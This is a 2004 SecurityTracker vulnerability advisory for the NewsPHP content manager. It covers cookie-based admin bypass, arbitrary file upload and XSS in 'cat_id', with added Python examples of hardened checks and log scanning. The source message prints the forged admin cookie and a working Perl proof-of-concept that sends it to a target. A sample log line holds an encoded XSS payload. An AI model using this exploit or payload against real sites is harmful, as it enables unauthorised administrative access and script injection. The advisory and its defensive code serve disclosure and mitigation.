NewsPHP Authentication Flaw Lets Remote Users Gain Administrative Access
SecurityTracker Alert ID: 1009740
SecurityTracker URL: http://securitytracker.com/id/1009740
Date: Apr 12 2004
Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included: Yes
Manuel Lopez reported several vulnerabilities in NewsPHP. A remote user can gain administrative access on the application. A remote authenticated administrator can upload arbitrary files. Cross-site scripting attacks are also possible.
It is reported that the software does not properly validate user-supplied cookies to authenticate administrative users. A remote user can reportedly supply the following cookie to gain administrative access:
A demonstration exploit script is provided in the Source Message.
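The trust failure described above, as an added example (not NewsPHP's code, which this entry does not show): a check that believes role values asserted in a cookie, beside one that accepts the role only from a token the server issued and signed. The function names, the `session` cookie name and the token layout are assumptions of this sketch.

```python
import hashlib
import hmac
import secrets
import time

# Assumption: a per-deployment secret that never leaves the server.
SERVER_KEY = secrets.token_bytes(32)


def parse_cookies(header):
    """Split a Cookie header into a name -> value dict."""
    pairs = (part.strip().partition("=") for part in header.split(";"))
    return {name: value for name, sep, value in pairs if sep}


def is_admin_trusting(header):
    """Flawed pattern: the role is whatever the client's cookie claims."""
    jar = parse_cookies(header)
    return jar.get("autorized") == "admin" and jar.get("root") == "admin"


def _mac(payload):
    return hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()


def issue_token(user, role, ttl=3600, now=None):
    """Called only after a successful login; binds user, role and expiry to a MAC."""
    expires = int((time.time() if now is None else now) + ttl)
    payload = f"{user}|{role}|{expires}"
    return f"{payload}|{_mac(payload)}"


def is_admin_verified(header, now=None):
    """Hardened pattern: take the role only from an unexpired, server-signed token."""
    parts = parse_cookies(header).get("session", "").split("|")
    if len(parts) != 4:
        return False
    user, role, expires, mac = parts
    expected = _mac(f"{user}|{role}|{expires}")
    if not hmac.compare_digest(mac.encode(), expected.encode()):
        return False  # forged or altered: the client does not hold SERVER_KEY
    if int(expires) < (time.time() if now is None else now):
        return False
    return role == "admin"
```

A server-side session store keyed by a random identifier achieves the same result; either way the role is never read from a value the client can choose.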
It is also reported that a remote authenticated administrator (or a remote user that has exploited the above described authentication vulnerability) can invoke the File Upload feature to upload arbitrary files instead of video files. The remote user can then load a URL to cause the uploaded file to be executed by the web server with the privileges of the web server.
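An added example of the server-side checks whose absence lets a non-video file through a video upload form (not NewsPHP's code): an extension allowlist, a content check against the declared container type, and a server-chosen storage name. The accepted formats, function names and storage directory are assumptions.

```python
import os
import secrets

# Assumption: the video formats the site intends to accept.
ALLOWED_VIDEO_EXTENSIONS = {".mp4", ".avi", ".mpg"}


def sniff_video(head):
    """Return the container type inferred from the leading bytes, or None."""
    if len(head) >= 12 and head[4:8] == b"ftyp":
        return ".mp4"
    if len(head) >= 12 and head[:4] == b"RIFF" and head[8:12] == b"AVI ":
        return ".avi"
    if head[:4] in (b"\x00\x00\x01\xba", b"\x00\x00\x01\xb3"):
        return ".mpg"
    return None


def accept_upload(client_filename, data, store_dir):
    """Return the server-chosen storage path, or raise ValueError."""
    # Only the final extension counts; the rest of the client's name is discarded.
    ext = os.path.splitext(os.path.basename(client_filename))[1].lower()
    if ext not in ALLOWED_VIDEO_EXTENSIONS:
        raise ValueError(f"extension {ext!r} is not an accepted video type")
    # Leading bytes must agree with the declared type. This check alone is not
    # sufficient; it complements the allowlist and the renaming below.
    if sniff_video(data[:16]) != ext:
        raise ValueError("content does not match the declared video type")
    # Random name: no client-controlled path or extra extension survives.
    return os.path.join(store_dir, secrets.token_hex(16) + ext)
```

The returned path should sit in a directory the web server serves as static content only, so that a file that slips past these checks is still never executed.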
It is also reported that the software does not properly filter HTML code from user-supplied input in the 'cat_id' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the NewsPHP software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
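An added example (not from the advisory or the vendor) that uses one predicate for both validating 'cat_id' and finding requests in web server logs where it carried something else. It assumes 'cat_id' is a numeric category key; the script path and log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Common Log Format prefix: client address, then the quoted request line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')


def clean_cat_id(raw):
    """Assumption: cat_id is a numeric category key. Return it as int, else None."""
    return int(raw) if re.fullmatch(r"[0-9]{1,9}", raw) else None


def suspicious_cat_ids(log_lines):
    """Return (client, decoded cat_id) for requests whose cat_id is not an integer."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs percent-decodes, so encoded markup is judged in decoded form.
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for raw in query.get("cat_id", []):
            if clean_cat_id(raw) is None:
                hits.append((client, raw))
    return hits


# Constructed sample lines; /index.php is a placeholder path, not from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Apr/2004:10:01:00 +0000] "GET /index.php?cat_id=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [12/Apr/2004:10:02:13 +0000] '
    '"GET /index.php?cat_id=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5190',
    '192.0.2.10 - - [12/Apr/2004:10:03:40 +0000] "GET /index.php?page=2 HTTP/1.1" 200 4800',
]
```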
A demonstration exploit URL is provided:
The vendor was reportedly notified on April 3, 2004.
A remote user can gain administrative access on the application.
A remote authenticated administrator can upload arbitrary files to the target system and execute them with the privileges of the web server.
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the NewsPHP software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
No solution was available at the time of this entry.
Vendor URL: www.newsphp.com/
Access control error, Authentication error, Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
This archive entry has one or more follow-up message(s) listed below.
Source Message Contents
Subject: XSS, Admin Access via Cookie and File Upload vulnerability in NewsPHP.
#Title: XSS, Admin Access via Cookie and File Upload vulnerability in
#Software: NewsPHP (All versions)
#Underlying OS: All
NewsPHP is a perfect solution for creating web publishing system, like an
online magazine, newspaper, TV/Radio or news portals. It works also as a
Content Management System that is easy to install and manage without having
to FTP upload your pages every time you need to update it.
A security vulnerability in the product allows attackers to cause the
product to think they are administrators by placing a fake Administrator
cookie on their computer.
A File Upload vulnerability in the Admin panel allows authenticated users
to upload arbitrary files instead of a video file.
This product also is vulnerable to the Cross-Site Scripting vulnerability.
The flaw is caused because cookie data is not properly checked for
This is the cookie and POC to gain administrator privileges in newsPHP:
### autorized=admin; root=admin ###
## PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP) ##------------
## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm
use IO::Socket;

# Require host, directory and output file arguments.
if (@ARGV < 3)
{
    print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n";
    print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n";
    print "By: Manuel Lopez mantra at gulo.org\n";
    exit(1);
}
$host = $ARGV[0];
$directorio = $ARGV[1];
$fichero = $ARGV[2];
print "----- Conecting .. <====\n\n";
# Open a TCP connection to the web server.
$socket = IO::Socket::INET->new(Proto => "tcp",
    PeerAddr => "$host", PeerPort => "80") || die "$socket error $!";
print "====> Conected\n";
print "====> Sending Data .. \n";
# Request the admin directory with the cookie values set by hand.
$socket->print(<<fin) or die "write: $!";
GET http://$host/$directorio/ HTTP/1.1
Cookie: autorized=admin; root=admin

fin
print "====> OK\n";
print "====> Generating $fichero ...\n";
# Save the server's response to the output file.
open( Result, ">$fichero");
print Result while <$socket>;
close Result;
A remote user can conduct cross-site scripting attacks due to an input
validation flaw in cat_id variable.
#File Upload vulnerability#
A user with privileges can upload executable code instead of a video in the
Administration Panel. Once the code has been uploaded, a user can execute
the code by calling the file; this will be executed with the privileges of
the web server.
There is no solution at the moment.
Vendor contacted Apr 3 2004
Manuel Lopez, firstname.lastname@example.org